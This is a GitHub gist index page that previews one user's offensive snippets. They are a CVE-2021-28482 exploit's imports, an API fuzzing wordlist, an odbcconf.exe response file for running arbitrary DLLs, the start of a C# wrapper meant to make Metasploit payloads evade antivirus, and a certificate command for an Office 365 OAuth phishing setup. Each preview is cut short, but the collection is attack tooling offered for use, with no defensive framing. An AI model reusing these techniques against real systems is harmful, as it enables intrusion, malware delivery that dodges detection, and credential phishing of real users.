Skip to content

Instantly share code, notes, and snippets.

@lex1010
lex1010 / PoC_CVE-2021-28482.py
Created November 27, 2021 15:32 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@lex1010
lex1010 / List of API endpoints & objects
Created September 18, 2021 02:47 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@lex1010
lex1010 / file.rsp
Created August 16, 2017 12:55
odbcconf.exe执行任意dll
REGSVR odbcconf.dll
@lex1010
lex1010 / MSFWrapper.cs
Created August 16, 2017 12:50
msf payload 免杀
using System;
using System.Threading;
using System.Runtime.InteropServices;
namespace MSFWrapper
{
public class Program
{
public Program()
{
RunMSF();
@lex1010
lex1010 / certificate
Last active August 16, 2017 12:44
office 365 oauth phishing
letsencrypto-auto certonly --standalone -d your.domain.com